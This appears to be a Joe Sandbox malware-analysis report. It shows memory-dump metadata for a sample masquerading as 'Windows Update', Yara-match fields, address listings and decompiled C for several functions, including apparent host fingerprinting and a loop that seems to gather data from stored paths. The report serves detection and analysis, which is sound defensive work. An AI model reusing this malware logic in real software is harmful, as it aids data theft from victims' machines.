                                                                                  0x00efcc06
                                                                                  0x00efc56c
                                                                                  0x00efc56f
                                                                                  0x00efc575
                                                                                  0x00efc5a5
                                                                                  0x00efc5a5
                                                                                  0x00efc5a6
                                                                                  0x00efc5ab
                                                                                  0x00efc5ae
                                                                                  0x00efcc1b
                                                                                  0x00000000
                                                                                  0x00efc5b4
                                                                                  0x00efc5b4
                                                                                  0x00efc5b9
                                                                                  0x00efc5be
                                                                                  0x00efc5c3
                                                                                  0x00efc5c8
                                                                                  0x00efc5cd
                                                                                  0x00efc5cf
                                                                                  0x00efc5d2
                                                                                  0x00efc605
                                                                                  0x00000000
                                                                                  0x00efc605
                                                                                  0x00efc5d4
                                                                                  0x00efc5d5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc5d8
                                                                                  0x00efc5d9
                                                                                  0x00efc5fe
                                                                                  0x00000000
                                                                                  0x00efc5fe
                                                                                  0x00efc5db
                                                                                  0x00efc5de
                                                                                  0x00efc5f7
                                                                                  0x00000000
                                                                                  0x00efc5f7
                                                                                  0x00efc5e1
                                                                                  0x00efc5e2
                                                                                  0x00efc5f0
                                                                                  0x00000000
                                                                                  0x00efc5f0
                                                                                  0x00efc5e7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc5e9
                                                                                  0x00efc60a
                                                                                  0x00efc60a
                                                                                  0x00efc60b
                                                                                  0x00efc610
                                                                                  0x00efc610
                                                                                  0x00efc615
                                                                                  0x00efc61d
                                                                                  0x00efc644
                                                                                  0x00efc675
                                                                                  0x00efc678
                                                                                  0x00efc6ca
                                                                                  0x00efc6cf
                                                                                  0x00efc6d2
                                                                                  0x00efc6f3
                                                                                  0x00efc6f8
                                                                                  0x00efc6f8
                                                                                  0x00efc6fd
                                                                                  0x00efc6fd
                                                                                  0x00efc702
                                                                                  0x00efc704
                                                                                  0x00efc708
                                                                                  0x00efc70d
                                                                                  0x00efc70f
                                                                                  0x00efc716
                                                                                  0x00efc719
                                                                                  0x00efc720
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc74a
                                                                                  0x00efc74a
                                                                                  0x00efc75a
                                                                                  0x00efc75b
                                                                                  0x00efc762
                                                                                  0x00efc762
                                                                                  0x00efc766
                                                                                  0x00efc76d
                                                                                  0x00efc771
                                                                                  0x00000000
                                                                                  0x00efc777
                                                                                  0x00efc777
                                                                                  0x00efc777
                                                                                  0x00efc771
                                                                                  0x00efc731
                                                                                  0x00efc733
                                                                                  0x00efc737
                                                                                  0x00efc746
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc737
                                                                                  0x00efc6d4
                                                                                  0x00efc6d5
                                                                                  0x00efc6db
                                                                                  0x00efc6e0
                                                                                  0x00efc6e3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc6e5
                                                                                  0x00efc6e6
                                                                                  0x00efc6e9
                                                                                  0x00efc6ee
                                                                                  0x00000000
                                                                                  0x00efc6ee
                                                                                  0x00efc67a
                                                                                  0x00efc67f
                                                                                  0x00efc680
                                                                                  0x00efc686
                                                                                  0x00efc689
                                                                                  0x00efc6c3
                                                                                  0x00efc6ab
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc6b4
                                                                                  0x00efc6b8
                                                                                  0x00efc6b9
                                                                                  0x00efc6bd
                                                                                  0x00efc6c0
                                                                                  0x00efc6c0
                                                                                  0x00000000
                                                                                  0x00efc6c8
                                                                                  0x00efc68b
                                                                                  0x00efc692
                                                                                  0x00efc695
                                                                                  0x00efc699
                                                                                  0x00efc69b
                                                                                  0x00efc69b
                                                                                  0x00efc69f
                                                                                  0x00efc6a0
                                                                                  0x00efc6a3
                                                                                  0x00000000
                                                                                  0x00efc6a3
                                                                                  0x00efc646
                                                                                  0x00efc652
                                                                                  0x00efc656
                                                                                  0x00efc657
                                                                                  0x00efc65b
                                                                                  0x00efc661
                                                                                  0x00efc664
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc664
                                                                                  0x00efc666
                                                                                  0x00efc66f
                                                                                  0x00efc671
                                                                                  0x00efc671
                                                                                  0x00000000
                                                                                  0x00efc66f
                                                                                  0x00efc61f
                                                                                  0x00efc621
                                                                                  0x00efc626
                                                                                  0x00efc629
                                                                                  0x00efc62d
                                                                                  0x00efc62f
                                                                                  0x00efc633
                                                                                  0x00efc633
                                                                                  0x00efc638
                                                                                  0x00efc639
                                                                                  0x00efc63c
                                                                                  0x00000000
                                                                                  0x00efc63c
                                                                                  0x00efc577
                                                                                  0x00efc579
                                                                                  0x00efc57d
                                                                                  0x00efc585
                                                                                  0x00efc585
                                                                                  0x00efc586
                                                                                  0x00efc58c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc582
                                                                                  0x00000000
                                                                                  0x00efc584
                                                                                  0x00efc584
                                                                                  0x00000000
                                                                                  0x00efc584
                                                                                  0x00efc582
                                                                                  0x00efc596
                                                                                  0x00efc59f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc59f
                                                                                  0x00000000
                                                                                  0x00efcc0c
                                                                                  0x00efcadc
                                                                                  0x00efcae2
                                                                                  0x00efc931
                                                                                  0x00efc935
                                                                                  0x00efc93a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc93f
                                                                                  0x00efc944
                                                                                  0x00efc948
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc94a
                                                                                  0x00efc94a
                                                                                  0x00efc94a
                                                                                  0x00efc94b
                                                                                  0x00efc94c
                                                                                  0x00efc94e
                                                                                  0x00efc950
                                                                                  0x00efc954
                                                                                  0x00000000
                                                                                  0x00efc954
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00efc90e
                                                                                  0x00efc90e
                                                                                  0x00efc90e
                                                                                  0x00efc90f
                                                                                  0x00efc912
                                                                                  0x00efc912
                                                                                  0x00efc917
                                                                                  0x00000000

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm$__aullrem
                                                                                  • String ID: +$@AD
                                                                                  • API String ID: 643879872-3073025900
                                                                                  • Opcode ID: 0d7612511857791f632887a230211975cfd4e8a3c881828d6afa5ce276b5977e
                                                                                  • Instruction ID: db793c5f85abe5273684e886cd92057b9df984c79da888ab5f6343c8fafb13b7
                                                                                  • Opcode Fuzzy Hash: 0d7612511857791f632887a230211975cfd4e8a3c881828d6afa5ce276b5977e
                                                                                  • Instruction Fuzzy Hash: 2AC19E7150838D8ED715CF28864477ABBE0AFDA708F38685DEAC4A6251D374DA48CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F460BE, Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 45%
                                                                                  			E00F460BE(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v291;
				char _v292;
				char _v547;
				char _v548;
				char _v1058;
				char _v1060;
				char _v1570;
				char _v1572;
				char* _t81;
				char* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				signed int _t97;
				intOrPtr* _t102;
				signed short* _t103;
				intOrPtr _t106;
				void* _t107;

				_t85 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				L00F503F4();
				_v548 = 0;
				L00F503F4();
				_v1572 = 0;
				L00F503F4();
				_v1060 = 0;
				L00F503F4();
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
				_v24 = 0xff;
				 *0x412018( &_v548,  &_v24);
				_t102 =  *0x4120d0;
				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_t81 =  &_v292;
				_push(_t81);
				L00F503B6();
				_v32 = _t81;
				_t82 =  &_v548;
				_push(_t82);
				L00F503B6();
				_t106 = _v36;
				_v28 = _t82;
				_push(0x10);
				_push( &_v20);
				_push(_t106);
				L00F5043C();
				_t84 = 0xba0da71d;
				if(_v28 > 0) {
					_t103 =  &_v1060;
					do {
						_t97 = _a4 & 0x80000003;
						if(_t97 < 0) {
							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t89 = ( *_t103 & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
						_a4 = _a4 + 1;
						_t103 =  &(_t103[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t85) {
					do {
						_t92 = _a4 & 0x80000003;
						if(_t92 < 0) {
							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
						_a4 = _a4 + 1;
						_t85 = _t85 + 1;
					} while (_t85 < _v32);
				}
				return _t84;
			}











































                                                                                  0x00f460cf
                                                                                  0x00f460da
                                                                                  0x00f460de
                                                                                  0x00f460e2
                                                                                  0x00f460e6
                                                                                  0x00f460ea
                                                                                  0x00f460ee
                                                                                  0x00f460f2
                                                                                  0x00f460f6
                                                                                  0x00f460fa
                                                                                  0x00f460fe
                                                                                  0x00f46102
                                                                                  0x00f46106
                                                                                  0x00f4610a
                                                                                  0x00f4610e
                                                                                  0x00f46112
                                                                                  0x00f46116
                                                                                  0x00f4611a
                                                                                  0x00f46120
                                                                                  0x00f4612e
                                                                                  0x00f46134
                                                                                  0x00f46147
                                                                                  0x00f4614e
                                                                                  0x00f4615c
                                                                                  0x00f46163
                                                                                  0x00f4616e
                                                                                  0x00f4617f
                                                                                  0x00f46182
                                                                                  0x00f46185
                                                                                  0x00f46196
                                                                                  0x00f46199
                                                                                  0x00f4619f
                                                                                  0x00f461b8
                                                                                  0x00f461cd
                                                                                  0x00f461cf
                                                                                  0x00f461d5
                                                                                  0x00f461d6
                                                                                  0x00f461db
                                                                                  0x00f461de
                                                                                  0x00f461e4
                                                                                  0x00f461e5
                                                                                  0x00f461ea
                                                                                  0x00f461ed
                                                                                  0x00f461f0
                                                                                  0x00f461f5
                                                                                  0x00f461f6
                                                                                  0x00f461f7
                                                                                  0x00f46202
                                                                                  0x00f46207
                                                                                  0x00f46209
                                                                                  0x00f4620f
                                                                                  0x00f46212
                                                                                  0x00f46218
                                                                                  0x00f4621e
                                                                                  0x00f4621e
                                                                                  0x00f46222
                                                                                  0x00f46225
                                                                                  0x00f4622e
                                                                                  0x00f46230
                                                                                  0x00f46237
                                                                                  0x00f46238
                                                                                  0x00f4620f
                                                                                  0x00f46240
                                                                                  0x00f46242
                                                                                  0x00f46245
                                                                                  0x00f4624b
                                                                                  0x00f46251
                                                                                  0x00f46251
                                                                                  0x00f4625a
                                                                                  0x00f4625d
                                                                                  0x00f46266
                                                                                  0x00f46268
                                                                                  0x00f4626b
                                                                                  0x00f4626c
                                                                                  0x00f46242
                                                                                  0x00f46275

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                  • API String ID: 0-3760989150
                                                                                  • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                  • Instruction ID: b60148f7cd5ea1501988367bdcf00cb2c64412daab4e22d48f817e87b06c76bc
                                                                                  • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                  • Instruction Fuzzy Hash: 2851D97180025DAEDF11CBA4CC40AEEBBBCEF49314F0441A9EA55E6191D7789B84CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F41642, Relevance: 8.9, Strings: 7, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 83%
                                                                                  			E00F41642(void* __fp0) {
				void* __esi;
				void* _t65;
				signed int _t89;
				void* _t92;
				intOrPtr _t106;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t118;

				_t118 = __fp0;
				_t108 = _t110 - 0x70;
				_t111 = _t110 - 0x474;
				 *((intOrPtr*)(_t108 + 0x40)) = 0x412774;
				 *((intOrPtr*)(_t108 + 0x44)) = 0x412784;
				 *((intOrPtr*)(_t108 + 0x48)) = 0x412794;
				 *((intOrPtr*)(_t108 + 0x4c)) = 0x4127a4;
				 *((intOrPtr*)(_t108 + 0x50)) = 0x4127b4;
				 *((intOrPtr*)(_t108 + 0x54)) = 0x4127c0;
				 *((intOrPtr*)(_t108 + 0x58)) = 0x4127cc;
				 *((intOrPtr*)(_t108 + 0x5c)) = 0x4127d8;
				 *((intOrPtr*)(_t108 + 0x20)) = 0x41263c;
				 *((intOrPtr*)(_t108 + 0x24)) = 0x412648;
				 *((intOrPtr*)(_t108 + 0x28)) = 0x4127e4;
				 *((intOrPtr*)(_t108 + 0x2c)) = 0x412664;
				 *((intOrPtr*)(_t108 + 0x30)) = 0x4126b4;
				 *((intOrPtr*)(_t108 + 0x34)) = 0x4126c0;
				 *((intOrPtr*)(_t108 + 0x38)) = 0x4127f4;
				 *((intOrPtr*)(_t108 + 0x3c)) = 0x4126dc;
				 *((intOrPtr*)(_t108 + 0x60)) = 0x412800;
				 *((intOrPtr*)(_t108 + 0x64)) = 0x412810;
				 *((intOrPtr*)(_t108 + 0x68)) = 0x412820;
				 *((intOrPtr*)(_t108 + 0x6c)) = 0x412834;
				_t89 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t108 - 0x5f);
					 *((char*)(_t108 - 0x60)) = 0;
					L00F503F4();
					_t111 = _t111 + 0xc;
					_t97 = _t89 << 2;
					_t65 = E00F41819(_t108 - 0x60,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + (_t89 << 2) + 0x50)));
					if(_t65 != 0) {
						E00F4104A(_t108 - 0x404);
						_push(_t108 - 0x60);
						_push(_t108 - 0x1f0);
						L00F503FA();
						_pop(_t92);
						 *((intOrPtr*)(_t108 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x78)) + 0xb1c));
						_t37 = _t89 + 1; // 0x1
						 *((intOrPtr*)(_t108 - 0x1f4)) = _t37;
						E00F41819(_t108 - 0x2f4,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x20)));
						E00F41819(_t108 - 0x3f8,  *((intOrPtr*)(_t108 + 0x7c)), 0x412844);
						E00F41819(_t108 - 0x374,  *((intOrPtr*)(_t108 + 0x7c)), 0x412854);
						if(_t89 != 3) {
							E00F41819(_t108 - 0x274,  *((intOrPtr*)(_t108 + 0x7c)), 0x412664);
							E00F4D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)), 0x4126dc, _t108 - 0x68);
							_t111 = _t111 + 0xc;
						}
						E00F4D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x30)), _t108 - 0x70);
						E00F4D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x60)), _t108 - 0x6c);
						_t106 =  *((intOrPtr*)(_t108 + 0x78));
						_t111 = _t111 + 0x18;
						E00F412DE(_t106, _t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x40)), _t108 - 0x170, 1);
						_push(_t106 + 0xa9c);
						_push(_t108 - 0xf0);
						L00F503FA();
						_t65 = E00F41279(_t108 - 0x404, _t118, _t106);
					}
					_t89 = _t89 + 1;
				} while (_t89 < 4);
				return _t65;
			}












                                                                                  0x00f41642
                                                                                  0x00f41643
                                                                                  0x00f41647
                                                                                  0x00f41650
                                                                                  0x00f41657
                                                                                  0x00f4165e
                                                                                  0x00f41665
                                                                                  0x00f4166c
                                                                                  0x00f41673
                                                                                  0x00f4167a
                                                                                  0x00f41681
                                                                                  0x00f41688
                                                                                  0x00f4168f
                                                                                  0x00f41696
                                                                                  0x00f4169d
                                                                                  0x00f416a4
                                                                                  0x00f416ab
                                                                                  0x00f416b2
                                                                                  0x00f416b9
                                                                                  0x00f416c0
                                                                                  0x00f416c7
                                                                                  0x00f416ce
                                                                                  0x00f416d5
                                                                                  0x00f416dc
                                                                                  0x00f416de
                                                                                  0x00f416de
                                                                                  0x00f416e3
                                                                                  0x00f416e5
                                                                                  0x00f416e6
                                                                                  0x00f416ea
                                                                                  0x00f416ef
                                                                                  0x00f416f4
                                                                                  0x00f41701
                                                                                  0x00f41708
                                                                                  0x00f41714
                                                                                  0x00f4171c
                                                                                  0x00f41723
                                                                                  0x00f41724
                                                                                  0x00f41733
                                                                                  0x00f41738
                                                                                  0x00f41741
                                                                                  0x00f4174a
                                                                                  0x00f41750
                                                                                  0x00f41763
                                                                                  0x00f41776
                                                                                  0x00f4177e
                                                                                  0x00f4178e
                                                                                  0x00f4179f
                                                                                  0x00f417a4
                                                                                  0x00f417a4
                                                                                  0x00f417b2
                                                                                  0x00f417c2
                                                                                  0x00f417c7
                                                                                  0x00f417ca
                                                                                  0x00f417df
                                                                                  0x00f417ea
                                                                                  0x00f417f1
                                                                                  0x00f417f2
                                                                                  0x00f41800
                                                                                  0x00f41800
                                                                                  0x00f41805
                                                                                  0x00f41806
                                                                                  0x00f41816

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                                  • API String ID: 0-2857912252
                                                                                  • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                  • Instruction ID: 80830ee7ed8811d1de502ca65db655b684a18a5700d29dc67b2bc2f4ec5ea078
                                                                                  • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                  • Instruction Fuzzy Hash: CD514AB190025D9BDF24DF60CD45ADD3BB8FF04308F10812AFD28A6151D7B99AA9DF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F09829, Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 88%
                                                                                  			E00F09829(intOrPtr _a4, signed char* _a8, intOrPtr _a12, char _a16, signed int* _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				void* __edi;
				void* __esi;
				signed int _t66;
				void* _t70;
				intOrPtr _t71;
				signed int _t74;
				signed int _t84;
				void* _t85;
				signed int _t94;
				signed int* _t95;
				signed int _t96;
				signed int* _t97;
				signed char* _t100;
				signed int _t101;
				signed char _t104;
				signed char* _t136;
				intOrPtr _t140;

				_t136 = _a8;
				_v20 = 0;
				_v8 = 0;
				_v12 = 1;
				_v16 = 0x4435dc;
				if(_t136 != 0) {
					_t101 =  *_t136 & 0x000000ff;
					if(_t101 == 0x84) {
						_t101 = _t136[0x23] & 0x000000ff;
					}
					if(_t101 != 0x9c) {
						L8:
						if(_t101 == 0x5e || _t101 == 0x82 || _t101 == 0x81) {
							_t140 = _a4;
							_t66 = E00F0980E(_t140);
							_v8 = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							if((_t136[2] & 0x00000400) == 0) {
								_push(_t136[4]);
								_t71 = E00EFCE3A(0x44a3c8, _v16);
								_v20 = _t71;
								if(_t71 != 0) {
									_t129 = _v8;
									if(_v8 != 0) {
										E00F093C1(0x41315e, _t129, _t71, 1);
									}
									if(_t101 == 0x82) {
										 *((char*)(_v8 + 0x1e)) = 2;
									}
									L27:
									if(_t101 == 0x81 || _t101 == 0x82) {
										if(_a16 != 0x62) {
											goto L31;
										}
										_push(0x63);
										goto L32;
									} else {
										L31:
										_push(_a16);
										L32:
										E00F0BE00(_v8);
										_t74 = _v8;
										if(( *(_t74 + 0x1c) & 0x0000000c) != 0) {
											 *(_t74 + 0x1c) =  *(_t74 + 0x1c) & 0x0000fffd;
										}
										goto L34;
									}
								}
								goto L22;
							}
							E00F09280(_v8, _t136[4] * _v12, _t136[4] * _v12 >> 0x20);
							goto L27;
						} else {
							if(_t101 != 0x9c) {
								if(_t101 != 0x83) {
									L36:
									 *_a20 = _v8;
									goto L37;
								}
								_t140 = _a4;
								_t84 = E00F0980E(_t140);
								_v8 = _t84;
								if(_t84 == 0) {
									L22:
									 *((char*)(_t140 + 0x1e)) = 1;
									E00EFC16B(_t140, _v20);
									E00F09A4C(_v8);
									 *_a20 =  *_a20 & 0x00000000;
									_t70 = 7;
									return _t70;
								}
								_t85 = E00EFD157(_t136[4] + 2);
								asm("cdq");
								E00F093C1(0x41315e, _v8, E00EFD801(_t140, 0x9c, _t136[4] + 2, _t85 - 1), 0);
								L17:
								L34:
								_t108 = _v8;
								if(_v8 != 0) {
									E00F0BCAB(_t108);
								}
								goto L36;
							}
							L12:
							if(E00F09829(_a4, _t136[8], _a12, _a16,  &_v8) != 0) {
								goto L34;
							}
							E00F091BB(_v8);
							_t94 = _v8;
							_t95 = _t94 + 0x10;
							asm("adc edx, 0x0");
							 *_t95 =  ~( *_t95);
							_t95[1] =  ~( *(_t94 + 0x14));
							_t96 = _v8;
							_t97 = _t96 + 8;
							asm("adc edx, 0x0");
							 *_t97 =  ~( *_t97);
							_t97[1] =  ~( *(_t96 + 0xc));
							E00F0BE00(_v8, _a16);
							goto L17;
						}
					}
					_t100 = _t136[8];
					_t104 =  *_t100;
					if(_t104 == 0x81 || _t104 == 0x82) {
						_v12 = _v12 | 0xffffffff;
						_t136 = _t100;
						_t101 =  *_t136 & 0x000000ff;
						_v16 = 0x44a3c4;
						goto L8;
					} else {
						goto L12;
					}
				} else {
					 *_a20 = 0;
					L37:
					return 0;
				}
			}
























                                                                                  0x00f09834
                                                                                  0x00f09839
                                                                                  0x00f0983c
                                                                                  0x00f0983f
                                                                                  0x00f09846
                                                                                  0x00f0984d
                                                                                  0x00f09859
                                                                                  0x00f09862
                                                                                  0x00f09864
                                                                                  0x00f09864
                                                                                  0x00f0986f
                                                                                  0x00f09890
                                                                                  0x00f09893
                                                                                  0x00f0996d
                                                                                  0x00f09970
                                                                                  0x00f09977
                                                                                  0x00f0997a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f09982
                                                                                  0x00f09998
                                                                                  0x00f099a3
                                                                                  0x00f099ad
                                                                                  0x00f099b0
                                                                                  0x00f099d4
                                                                                  0x00f099d9
                                                                                  0x00f099e6
                                                                                  0x00f099ec
                                                                                  0x00f099f3
                                                                                  0x00f099f8
                                                                                  0x00f099f8
                                                                                  0x00f099fc
                                                                                  0x00f09a02
                                                                                  0x00f09a10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f09a12
                                                                                  0x00000000
                                                                                  0x00f09a16
                                                                                  0x00f09a16
                                                                                  0x00f09a16
                                                                                  0x00f09a19
                                                                                  0x00f09a1c
                                                                                  0x00f09a21
                                                                                  0x00f09a29
                                                                                  0x00f09a2b
                                                                                  0x00f09a2b
                                                                                  0x00000000
                                                                                  0x00f09a29
                                                                                  0x00f09a02
                                                                                  0x00000000
                                                                                  0x00f099b0
                                                                                  0x00f0998f
                                                                                  0x00000000
                                                                                  0x00f098b1
                                                                                  0x00f098b3
                                                                                  0x00f0991e
                                                                                  0x00f09a3d
                                                                                  0x00f09a43
                                                                                  0x00000000
                                                                                  0x00f09a43
                                                                                  0x00f09924
                                                                                  0x00f09927
                                                                                  0x00f0992e
                                                                                  0x00f09931
                                                                                  0x00f099b2
                                                                                  0x00f099b5
                                                                                  0x00f099ba
                                                                                  0x00f099c4
                                                                                  0x00f099cc
                                                                                  0x00f099d1
                                                                                  0x00000000
                                                                                  0x00f099d1
                                                                                  0x00f0993a
                                                                                  0x00f09944
                                                                                  0x00f09961
                                                                                  0x00f09967
                                                                                  0x00f09a31
                                                                                  0x00f09a31
                                                                                  0x00f09a36
                                                                                  0x00f09a38
                                                                                  0x00f09a38
                                                                                  0x00000000
                                                                                  0x00f09a36
                                                                                  0x00f098b5
                                                                                  0x00f098cf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f098d8
                                                                                  0x00f098dd
                                                                                  0x00f098e3
                                                                                  0x00f098ed
                                                                                  0x00f098f0
                                                                                  0x00f098f4
                                                                                  0x00f098f7
                                                                                  0x00f098fd
                                                                                  0x00f09904
                                                                                  0x00f09909
                                                                                  0x00f0990b
                                                                                  0x00f09911
                                                                                  0x00000000
                                                                                  0x00f09911
                                                                                  0x00f09893
                                                                                  0x00f09871
                                                                                  0x00f09874
                                                                                  0x00f09879
                                                                                  0x00f09880
                                                                                  0x00f09884
                                                                                  0x00f09886
                                                                                  0x00f09889
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f0984f
                                                                                  0x00f09852
                                                                                  0x00f09a45
                                                                                  0x00000000
                                                                                  0x00f09a45

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ^$^1A$^1A$b$mbe.
                                                                                  • API String ID: 0-3662265252
                                                                                  • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                  • Instruction ID: 7789cc11dfbef057b4e45b0fedf8be83ca64653e7c5a5f9728c6f879e0e33681
                                                                                  • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                  • Instruction Fuzzy Hash: 4461AF31E08209EFDB14CF68C9817AD7BB1EF45320F248159E815AB2D3E7B99E50BB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F42E88, Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00F42E88(intOrPtr* __edi, void* __eflags) {
				void* __esi;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t59;

				_t60 = __edi;
				E00F47340(__edi, __eflags);
				 *((intOrPtr*)(__edi + 0x1d8)) = 0;
				 *((intOrPtr*)(__edi + 0x1cc)) = 0;
				 *((intOrPtr*)(__edi + 0x1d0)) = 0;
				 *((intOrPtr*)(__edi + 0x1d4)) = 0;
				_t5 = _t60 + 0x1e0; // 0x1e0
				_t49 = _t5;
				 *((intOrPtr*)(__edi + 0x1dc)) = 0x100;
				 *_t49 = 0x413754;
				 *((intOrPtr*)(_t49 + 0x10)) = 0;
				 *((intOrPtr*)(_t49 + 4)) = 0;
